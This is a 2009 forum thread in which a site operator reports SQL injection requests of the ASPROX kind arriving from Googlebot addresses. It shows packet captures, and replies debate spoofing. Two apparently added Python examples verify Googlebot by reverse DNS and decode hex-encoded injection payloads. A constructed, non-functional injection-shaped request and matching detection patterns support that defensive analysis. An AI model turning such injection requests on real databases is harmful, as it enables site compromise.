vladfriedman
asked on
Google used as a hacking tool - inadvertently attacking my site
Google is somehow being used or manipulated to attack our website. We have an IPS that records all attack traffic. At least 500 times a day, googlebot attempts to hit a few sites in our facility with either sql injection such as ASPROX. Because our IPS blocks the traffic, googlebot is never able to index the pages. The site itself is not compromised in any way and we cannot seem to determine why google is trying to do this. Because googlebot's traffic is being blocked, it is continuing to hit the site relentlessly.
Some packet captures are below
Frame 1 (1484 bytes on wire, 1484 bytes captured)
Arrival Time: May 19, 2009 04:16:02.248079000
Time delta from previous packet: 0.000000000 seconds
Time since reference or first frame: 0.000000000 seconds
Frame Number: 1
Packet Length: 1484 bytes
Capture Length: 1484 bytes
Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 1470
Identification: 0xeb57 (60247)
Flags: 0x04 (Don't Fragment)
0... = Reserved bit: Not set
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 56
Protocol: TCP (0x06)
Header checksum: 0x052a [correct]
Good: True
Bad : False
Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)
Destination: www.coolabah.com (69.63.131.110)
Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
Source port: 41347 (41347)
Destination port: http (80)
Sequence number: 0 (relative sequence number)
Next sequence number: 1418 (relative sequence number)
Acknowledgement number: 0 (relative ack number)
Header length: 32 bytes
Flags: 0x0010 (ACK)
0... .... = Congestion Window Reduced (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...1 .... = Acknowledgment: Set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..0. = Syn: Not set
.... ...0 = Fin: Not set
Window size: 90
Checksum: 0x9fda [correct]
Options: (12 bytes)
NOP
NOP
Time stamp: tsval 121714743, tsecr 0
TCP segment data (1418 bytes)
-----------------------------------------------------------------------------------------------------
Frame 1 (1484 bytes on wire, 1484 bytes captured)
Arrival Time: May 19, 2009 04:08:20.781412000
Time delta from previous packet: 0.000000000 seconds
Time since reference or first frame: 0.000000000 seconds
Frame Number: 1
Packet Length: 1484 bytes
Capture Length: 1484 bytes
Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 1470
Identification: 0xb69e (46750)
Flags: 0x04 (Don't Fragment)
0... = Reserved bit: Not set
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 57
Protocol: TCP (0x06)
Header checksum: 0x325c [correct]
Good: True
Bad : False
Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)
Destination: 69.63.131.111 (69.63.131.111)
Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
Source port: 33193 (33193)
Destination port: http (80)
Sequence number: 0 (relative sequence number)
Next sequence number: 1418 (relative sequence number)
Acknowledgement number: 0 (relative ack number)
Header length: 32 bytes
Flags: 0x0010 (ACK)
0... .... = Congestion Window Reduced (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...1 .... = Acknowledgment: Set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..0. = Syn: Not set
.... ...0 = Fin: Not set
Window size: 92
Checksum: 0x6bf1 [correct]
Options: (12 bytes)
NOP
NOP
Time stamp: tsval 3656893948, tsecr 0
TCP segment data (1418 bytes)
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything, that was what tells me that it's not really google, they move on quite quickly and typically only follow links and look for robots.txt
Google-bot first tries to find a robots.txt file, it tries in each directory it makes it into, I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
I agree with richrumble. There are some tools which use Google to crawl your website.
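Whether the source really is Googlebot can be checked with a forward-confirmed reverse DNS lookup: the PTR name must be under googlebot.com or google.com, and that name must resolve back to the same address. The following is an added example, not part of the original thread; the resolver tables are constructed so it runs offline, and `check_offline` is a hypothetical helper name.

```python
import socket

# Domains Google documents for its crawler hostnames.
GOOGLE_CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")


def _system_reverse(ip):
    """PTR lookup via the system resolver; returns a hostname or None."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def _system_forward(hostname):
    """A-record lookup via the system resolver; returns a list of IPv4 strings."""
    try:
        return socket.gethostbyname_ex(hostname)[2]
    except socket.gaierror:
        return []


def verify_googlebot(ip, reverse=_system_reverse, forward=_system_forward):
    """Forward-confirmed reverse DNS check; returns (verdict, detail).

    The PTR name alone proves nothing, because whoever controls the reverse
    zone for an address can publish any name there. The forward lookup of
    that name must lead back to the same address.
    """
    host = reverse(ip)
    if not host:
        return False, "no PTR record"
    host = host.rstrip(".").lower()
    if not host.endswith(GOOGLE_CRAWLER_SUFFIXES):
        return False, "PTR %s is not a Google crawler name" % host
    if ip not in forward(host):
        return False, "PTR %s does not resolve back to %s" % (host, ip)
    return True, host


# Constructed resolver data for an offline run (not real DNS answers).
# 66.249.65.18 and its name are the pair shown in the first capture;
# 203.0.113.7 is a documentation address given a forged PTR.
SAMPLE_PTR = {
    "66.249.65.18": "crawl-66-249-65-18.googlebot.com",
    "203.0.113.7": "crawl-66-249-65-18.googlebot.com",
    "198.51.100.9": "host9.example.net",
}
SAMPLE_A = {"crawl-66-249-65-18.googlebot.com": ["66.249.65.18"]}


def check_offline(ip):
    """Run the check against the constructed tables instead of real DNS."""
    return verify_googlebot(ip, SAMPLE_PTR.get, lambda h: SAMPLE_A.get(h, []))


if __name__ == "__main__":
    for addr in SAMPLE_PTR:
        print(addr, check_offline(addr))
```

Calling `verify_googlebot(ip)` with no resolver arguments uses the system resolver, which is how it would be run against addresses pulled from IPS or web server logs.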
ASKER
It is the real google bot, it is originating from google owned IPs. If I set up a page with sql injection commands pointing to a destination site, and then had google index my page, it would then try all of the links on my site which included the sql injection commands.
I know this is google. The problem is not that google is originating the attack. The trick is identifying the source page that was originally indexed.
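The requests the IPS logged carry their SQL as a hex literal in the query string (`DECLARE @S ...;SET @S=CAST(0x... AS CHAR(4000));EXEC(@S)`), so triaging a crawled link means decoding that literal first. The following is an added example, not part of the original thread; the sample request, its path and the placeholder host are constructed, and the inner SQL is a non-functional fragment.

```python
import re
from urllib.parse import unquote

# Matches SET @S=CAST(0x<hex> AS CHAR(n)) and its VARCHAR/NVARCHAR variants.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_cast_payload(request_line):
    """Return the SQL hidden in a CAST(0x...) literal, or None if absent."""
    query = unquote(request_line)      # %20 -> space, as the web server sees it
    m = CAST_HEX.search(query)
    if not m:
        return None
    hex_blob = m.group(1)
    if len(hex_blob) % 2:              # malformed literal: drop the odd nibble
        hex_blob = hex_blob[:-1]
    raw = bytes.fromhex(hex_blob)
    # NVARCHAR literals are UTF-16LE and show up as interleaved NUL bytes.
    if b"\x00" in raw:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def triage(request_line):
    """Summarise what the decoded statement does, for an IPS or log reviewer."""
    sql = decode_cast_payload(request_line)
    if sql is None:
        return None
    lowered = sql.lower()
    return {
        "executes_decoded_string": bool(EXEC_VAR.search(unquote(request_line))),
        "walks_schema": "sysobjects" in lowered and "syscolumns" in lowered,
        "script_sources": SCRIPT_SRC.findall(sql),
        "sql": sql,
    }


# Constructed sample: a harmless, non-functional fragment shaped like the
# logged requests. The host is a placeholder, not an indicator from the page.
SAMPLE_INNER_SQL = (
    "/* constructed */ select a.name,b.name from sysobjects a,syscolumns b "
    'where a.id=b.id -- <script src="http://placeholder.invalid/w.js"></script>'
)
SAMPLE_REQUEST = (
    "GET /page.cfm?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_INNER_SQL.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_REQUEST).items():
        print(key, "=", value)
```

The `script_sources` list is the part worth searching for in the database and in page output, since it names what a successful injection would have planted.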
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data and can be faked. Have you contacted Chris yet?
Best, ~Ray
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributing via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a receiver, not a sender)
-rich
ASKER
Hi Ray. The IP really can't be faked in our environment, and it is not being faked.
I am sure he will be interested and may have seen something similar that can help you out.
Best regards, ~Ray